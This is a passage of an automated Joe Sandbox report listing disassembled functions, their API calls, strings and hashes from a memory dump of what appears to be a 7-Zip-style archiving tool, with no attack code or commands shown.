Part of subcall function 009D5DB5: DeleteFileW.KERNEL32(?,?,?,00000000), ref: 009D5DFE

GetLastError.KERNEL32(?,?,?,0000005C,?,00000000,00000000), ref: 009D5FA4

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: ErrorLast$H_prolog$DeleteFile
String ID:
API String ID: 3586524497-0
Opcode ID: f3530100b8e069373d3c0e8617e96d251ffdcec995df76aa5348efb21f3a7008
Instruction ID: 914e24f144c4a1e6f85cbee626367a5597052ad14d4f560ccfcd2afba0b9277f
Opcode Fuzzy Hash: f3530100b8e069373d3c0e8617e96d251ffdcec995df76aa5348efb21f3a7008
Instruction Fuzzy Hash: 3C519E71C44218EEDF15EBA8E841BEEBB78AFA5300F10C15BE441772D2DB351A4ACB61

Uniqueness

Uniqueness Score: -1.00%

Function 009D3937 Relevance: 7.6, APIs: 5, Instructions: 98COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,00000000,0000005F,00000000,00000000,00000000,00000000,00000000,?,?,75BFAB50,0000005F,?,?,?), ref: 009D396F
GetLastError.KERNEL32(?,?,75BFAB50,0000005F,?,?,?), ref: 009D3978
_CxxThrowException.MSVCRT(?,00A4FFC8), ref: 009D3996
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000005F,00000000,?,?,00000001,00000001,?,?,75BFAB50,0000005F,?), ref: 009D39FD
_CxxThrowException.MSVCRT(0000FDE9,00A4FFC8), ref: 009D3A25

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: ByteCharExceptionMultiThrowWide$ErrorLast
String ID:
API String ID: 2296236218-0
Opcode ID: 73ed6bdea5b3ae5bff01aeed3e4911de9a31171a6ff1338a179d6c15d64a9a46
Instruction ID: 98f445dab32698170673b516a5ce3df345d8667c9599365318d30fbb806862a6
Opcode Fuzzy Hash: 73ed6bdea5b3ae5bff01aeed3e4911de9a31171a6ff1338a179d6c15d64a9a46
Instruction Fuzzy Hash: 0E31C175A48249BFDB11CFA4CC80BAEBBB8EF55305F10C15AE448D7281D7B49A45CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 009E31BB Relevance: 7.6, APIs: 6, Instructions: 84COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 009E31D4
memcmp.MSVCRT ref: 009E31E7
memcmp.MSVCRT ref: 009E3204
memcmp.MSVCRT ref: 009E3221
memcmp.MSVCRT ref: 009E323E

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: memcmp
String ID:
API String ID: 1475443563-0
Opcode ID: 5b604de6d9d93c1285c8cdcde1183a280a1c23c0438b9d3a4768b21e05aa91d9
Instruction ID: 6b3a9c6bc625bc2edbc93f523f5c8a45e3cbf3c2dc903216cbe6b87bc6279db5
Opcode Fuzzy Hash: 5b604de6d9d93c1285c8cdcde1183a280a1c23c0438b9d3a4768b21e05aa91d9
Instruction Fuzzy Hash: 482192B17002457FDB059A1ACD86FBA73ACAF90754F01C929FE569B346F664EF008690

Uniqueness

Uniqueness Score: -1.00%

Function 009DADA1 Relevance: 7.6, APIs: 6, Instructions: 83COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 009DADBA
memcmp.MSVCRT ref: 009DADD7
memcmp.MSVCRT ref: 009DADEA

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: memcmp
String ID:
API String ID: 1475443563-0
Opcode ID: aece5821847816efddb260562e1e64516f135cef7b311d296568cfaecb7a5e44
Instruction ID: 1dd6b5ac05c806050cf28c98e24f62fc19e233ffa8e571897ab8e552679a5f20
Opcode Fuzzy Hash: aece5821847816efddb260562e1e64516f135cef7b311d296568cfaecb7a5e44
Instruction Fuzzy Hash: 2121C6B27403057FD7148A10DD82FBF73AC9B90794F05882AFD069B341F664ED11C6A2

Uniqueness

Uniqueness Score: -1.00%

Function 009F7781 Relevance: 7.6, APIs: 6, Instructions: 83COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 009F779A
memcmp.MSVCRT ref: 009F77B7
memcmp.MSVCRT ref: 009F77CA

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: memcmp
String ID:
API String ID: 1475443563-0
Opcode ID: 94d0040a4b79850a8d6e0d784e95d9d6cb98645eee2fe1caf7f8bc991ab028eb
Instruction ID: 99273124ec197581419a599143b257d2709f98a7439f65e76bcfce3ba53f6ca1
Opcode Fuzzy Hash: 94d0040a4b79850a8d6e0d784e95d9d6cb98645eee2fe1caf7f8bc991ab028eb
Instruction Fuzzy Hash: 1F21A1B5B14209BFD7049E64DD82FBAB3ACAB90794F114839FE06DB241F664ED00C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00A11BDF Relevance: 7.6, APIs: 6, Instructions: 83COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 00A11BF8
memcmp.MSVCRT ref: 00A11C15
memcmp.MSVCRT ref: 00A11C28

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: memcmp
String ID:
API String ID: 1475443563-0
Opcode ID: af10eb0d20cf8a955aececc75fc5f162294332d7a26bb8712387cc9e79aa5569
Instruction ID: a705929f30e07ea85cb94deaa9f98fd5e9cba12f86f5c5f28f763636b0fe3b2d
Opcode Fuzzy Hash: af10eb0d20cf8a955aececc75fc5f162294332d7a26bb8712387cc9e79aa5569
Instruction Fuzzy Hash: 7A216FB5B502097FD7144B24DD82FFA73A9AB90794F054529FE469B241F660EE808690

Uniqueness

Uniqueness Score: -1.00%

Function 009D56DE Relevance: 7.6, APIs: 5, Instructions: 72filetimeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009D56E3
CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000000,?,?,?,?,?), ref: 009D5722
CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,00000000,?,?,00000000,?,?,?,?,?), ref: 009D5762
SetFileTime.KERNEL32(000000FF,?,?,?,?,?,00000000,?,?,?,?,?,?,?), ref: 009D5784
CloseHandle.KERNEL32(000000FF,?,00000000,?,?,?,?,?,?,?), ref: 009D5792

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: File$Create$CloseH_prologHandleTime
String ID:
API String ID: 213185242-0
Opcode ID: a9c8dc3b0296b78b9d50d0eb92e20603955f74847f7b7424f8ace658f28a5266
Instruction ID: 0f42d2f2d4f343683de34e823114ca42ea2443c0139a65da0f38939983803611
Opcode Fuzzy Hash: a9c8dc3b0296b78b9d50d0eb92e20603955f74847f7b7424f8ace658f28a5266
Instruction Fuzzy Hash: 86216A7598020AEADF219FA4DC46BEFBB79EF85324F108216F520B62E1C7714A51DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A05FA1 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00A05FA6
fputs.MSVCRT ref: 00A05FC4
fputs.MSVCRT ref: 00A05FE9

Part of subcall function 009D1E89: free.MSVCRT(?,009F6CD6,00000000,00000000,00000001,?,009D10EB), ref: 009D1E8D

fputs.MSVCRT ref: 00A06003

Part of subcall function 009F3294: strlen.MSVCRT ref: 009F32DE

fputs.MSVCRT ref: 00A06022

Part of subcall function 009D1FE9: fputc.MSVCRT ref: 009D1FF0

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: fputs$H_prologfputcfreestrlen
String ID:
API String ID: 154898386-0
Opcode ID: 41eddd67514525c0561321d6d96a9348a11046e87bbd0e866360baedcfc04609
Instruction ID: ffb6f7e3f0a21a19265fa2227846e4a6449ca41c78bd20f3ed4750bea1c3a0ea
Opcode Fuzzy Hash: 41eddd67514525c0561321d6d96a9348a11046e87bbd0e866360baedcfc04609
Instruction Fuzzy Hash: 15118636A00209EFDF05EFA4EC42AAEBB79EF84350F108127F615971A1DB359954DF90

Uniqueness

Uniqueness Score: -1.00%

Function 00A2C7C0 Relevance: 7.5, APIs: 5, Instructions: 46COMMON

Download Yara Rule

APIs

exit.MSVCRT ref: 00A2C7D2
exit.MSVCRT ref: 00A2C7FF
LeaveCriticalSection.KERNEL32(?), ref: 00A2C808
exit.MSVCRT ref: 00A2C82F
EnterCriticalSection.KERNEL32(?), ref: 00A2C838

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: exit$CriticalSection$EnterLeave
String ID:
API String ID: 43521-0
Opcode ID: b9b2af21e655a4efa06cf475114d1887180c7110405fd52e62ebac5357e642a4
Instruction ID: bffa1579b9e93fddc149cd3e0959ec24528fe524835ffc6f916c4db82835adb9
Opcode Fuzzy Hash: b9b2af21e655a4efa06cf475114d1887180c7110405fd52e62ebac5357e642a4
Instruction Fuzzy Hash: 071112B5400B018FC730EF65EA81A6AF7F0BF84311F504A3EA58642A41D770B58ACF91

Uniqueness

Uniqueness Score: -1.00%

Function 00A18383 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 181COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00A18388

Strings

LZMA:, xrefs: 00A18479
LZMA2:, xrefs: 00A18442
!, xrefs: 00A18438

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: H_prolog
String ID: !$LZMA2:$LZMA:
API String ID: 3519838083-3332058968
Opcode ID: e60be062c01d8d2b55861b9531c93d232d49da18a6aa211114393390002a8dfb
Instruction ID: 094bc31b4a77b1edefba973dbb31c1ab73fe2df5c3cd82b9b7f41dd60c64ee2a
Opcode Fuzzy Hash: e60be062c01d8d2b55861b9531c93d232d49da18a6aa211114393390002a8dfb
Instruction Fuzzy Hash: 7661B03094424AEEDF15DB68C985BFDBBB2EF54314F1840AAE5066B162DF789EC4CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00A1A6EF Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 151COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00A1A6F4

Part of subcall function 009D34EF: memmove.MSVCRT ref: 009D3514

Part of subcall function 00A1A642: __EH_prolog.LIBCMT ref: 00A1A647

Strings

hcf, xrefs: 00A1A7B9
rsfx, xrefs: 00A1A77F
mtf, xrefs: 00A1A885

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: H_prolog$memmove
String ID: hcf$mtf$rsfx
API String ID: 593149739-3699647704
Opcode ID: 25d8226fa6a628cb790bf1a18caf73d2faa9642634085222ced01e13113f15e3
Instruction ID: 8717fa5c602ae9919a4e07c0be3c625eb53fa6ace43704f238e36e5b2826c517
Opcode Fuzzy Hash: 25d8226fa6a628cb790bf1a18caf73d2faa9642634085222ced01e13113f15e3
Instruction Fuzzy Hash: 2451B335D056059BCF24EB64C4806FEB372EFA4314F14C42AE8669B385DB349E87DB52

Uniqueness

Uniqueness Score: -1.00%

Function 00A05A7B Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 118COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00A05A80

Part of subcall function 00A058F5: __EH_prolog.LIBCMT ref: 00A058FA

fputs.MSVCRT ref: 00A05BB5

Strings

Name, xrefs: 00A05B8F
Size, xrefs: 00A05B4C

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: H_prolog$fputs
String ID: Name$Size
API String ID: 3822167597-481755742
Opcode ID: a2de9e756433acba3fac68ef32a6eeb6d9b7bfd78ec1e12fcc13af4e186cfdc3
Instruction ID: 856579da3fffd0f3b3e033715d321bf4e884ddb02acf4946d9bcb9d3808be1c1
Opcode Fuzzy Hash: a2de9e756433acba3fac68ef32a6eeb6d9b7bfd78ec1e12fcc13af4e186cfdc3
Instruction Fuzzy Hash: ED416235E046089FCF05EFB4E995AAEB7B5BF89310F108429E845AB391DB34AD41CF60

Uniqueness

Uniqueness Score: -1.00%

Function 009E17B8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009E17BD
_CxxThrowException.MSVCRT(?,00A51428), ref: 009E18D0
_CxxThrowException.MSVCRT(?,00A51428), ref: 009E18EE

Part of subcall function 009E1904: __EH_prolog.LIBCMT ref: 009E1909
Part of subcall function 009E1904: _CxxThrowException.MSVCRT(?,00A51428), ref: 009E19AD

Strings

There is no second file name for rename pair:, xrefs: 009E18BD

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: ExceptionThrow$H_prolog
String ID: There is no second file name for rename pair:
API String ID: 206451386-3412818124
Opcode ID: 32018801110693b31dad02c7dfda61406cf1791f6ccb2d947dcbf7f23d34de8b
Instruction ID: 79ce8b532902e0a8c32417a8265e7fa5b13cabd68069fca499767dd2f123d280
Opcode Fuzzy Hash: 32018801110693b31dad02c7dfda61406cf1791f6ccb2d947dcbf7f23d34de8b
Instruction Fuzzy Hash: 5841AC7590028AEFCF02DF95C881BAEBBB5BF99314F108259F91167291C770AD54CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 009F5944 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 103COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009F5949

Part of subcall function 00A16B33: _CxxThrowException.MSVCRT(?,00A4FFC8), ref: 00A16B59

Part of subcall function 009D1524: __EH_prolog.LIBCMT ref: 009D1529

Part of subcall function 009D1E89: free.MSVCRT(?,009F6CD6,00000000,00000000,00000001,?,009D10EB), ref: 009D1E8D

Part of subcall function 009D3525: memmove.MSVCRT ref: 009D3561

Strings

crc, xrefs: 009F5A2E
memuse, xrefs: 009F5A80
flags, xrefs: 009F59DF

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: H_prolog$ExceptionThrowfreememmove
String ID: crc$flags$memuse
API String ID: 2665131394-339511674
Opcode ID: 38cd4f62c442b50efc36cfd90b7feceb66982ea53a444934f2b47ba32c160c16
Instruction ID: 0ecf467442ec2f79df438f0ba87abcc80497c353f5919a4186626dc5ec27f810
Opcode Fuzzy Hash: 38cd4f62c442b50efc36cfd90b7feceb66982ea53a444934f2b47ba32c160c16
Instruction Fuzzy Hash: 6C31F43194060ADBCF05EB90D842BFEBBB5AF94314F108156E6413B292DB759E89CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 009D9F47 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 88COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009D9F4C

Part of subcall function 009DA088: GetModuleHandleW.KERNEL32(ntdll.dll,?,009D9F84,00000001), ref: 009DA090
Part of subcall function 009DA088: GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 009DA0A0

Strings

SP:, xrefs: 009D9FFE
: , xrefs: 009DA051
Windows, xrefs: 009D9F8C

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: AddressH_prologHandleModuleProc
String ID: : $ SP:$Windows
API String ID: 786088110-3655538264
Opcode ID: d2edeb298111acab89982cd740001a5127bb78d6f224837c2faf4e42dfb6e6d2
Instruction ID: 02ef679d5532f412f50a993f74ce86d48232f733d4b17e83462a7930bc4f9f53
Opcode Fuzzy Hash: d2edeb298111acab89982cd740001a5127bb78d6f224837c2faf4e42dfb6e6d2
Instruction Fuzzy Hash: CE314131C802099BCF15FFA1D953AEEBB74AFA8300F00806AE10172291DB705E89DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A0C2D1 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 83COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 00A0C31F
fputs.MSVCRT ref: 00A0C34D

Part of subcall function 009D1FE9: fputc.MSVCRT ref: 009D1FF0

Strings

Removing, xrefs: 00A0C330, 00A0C3CC
: Removing files after including to archive, xrefs: 00A0C31A

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: fputs$fputc
String ID: : Removing files after including to archive$Removing
API String ID: 1185151155-1218467041
Opcode ID: d630814050b0ba5aec565064e912d9b005882760e8de0ec68974f0efd9e3e61a
Instruction ID: f034f6a5b074c906b9b0c18d797e8bf7a28d7d6cb23e1cb2ecff86a92d3c0bb9
Opcode Fuzzy Hash: d630814050b0ba5aec565064e912d9b005882760e8de0ec68974f0efd9e3e61a
Instruction Fuzzy Hash: 16315E325447459BC765EB74E891BAAF3A6FF94310F00CA2EE09B06192EF217859DB12

Uniqueness

Uniqueness Score: -1.00%

Function 009EDD93 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 68COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009EDD98

Part of subcall function 009EA24D: memset.MSVCRT ref: 009EA268
Part of subcall function 009EA24D: strlen.MSVCRT ref: 009EA286

Strings

?, xrefs: 009EDDDA
RAM , xrefs: 009EDDA8
MB, xrefs: 009EDDE5

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: H_prologmemsetstrlen
String ID: ?$ MB$RAM
API String ID: 2475707007-294454972
Opcode ID: 5b17da03e8e9c82f4ca2f73036182d593757c0ed11499b80c7dbf660ecd9f04b
Instruction ID: 24f15d9f4d45c22c821cff639b8ee822619cc7aedbcb77c341debcbf3e289f36
Opcode Fuzzy Hash: 5b17da03e8e9c82f4ca2f73036182d593757c0ed11499b80c7dbf660ecd9f04b
Instruction Fuzzy Hash: 35214935B00204AFCB25EF59C84AB6EBBB5EF99711F10441AF6429B3E0CB749D41DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00A0C88A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00A0C88F
fputs.MSVCRT ref: 00A0C8FF
fputs.MSVCRT ref: 00A0C908

Part of subcall function 00A0B618: fputs.MSVCRT ref: 00A0B681

Strings

: , xrefs: 00A0C903

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: fputs$H_prolog
String ID: :
API String ID: 2614055831-3653984579
Opcode ID: 1deb814a3987d9be655753bd52ba9718cf733951ccf88106385def17f33c23e7
Instruction ID: 48e25683968565ff5bb82c85de6af6f00a42e44af0edc8a381dcc2bc27df9179
Opcode Fuzzy Hash: 1deb814a3987d9be655753bd52ba9718cf733951ccf88106385def17f33c23e7
Instruction Fuzzy Hash: FB118436540605EFDB15ABA5D882FAFB776FFC4310F10851FE81617291DB31A851CB61

Uniqueness

Uniqueness Score: -1.00%

Function 009E1904 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 61COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009E1909

Part of subcall function 009E27EA: __EH_prolog.LIBCMT ref: 009E27EF

_CxxThrowException.MSVCRT(?,00A51428), ref: 009E19AD

Strings

Unsupported rename command:, xrefs: 009E199A
-r0, xrefs: 009E1987

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
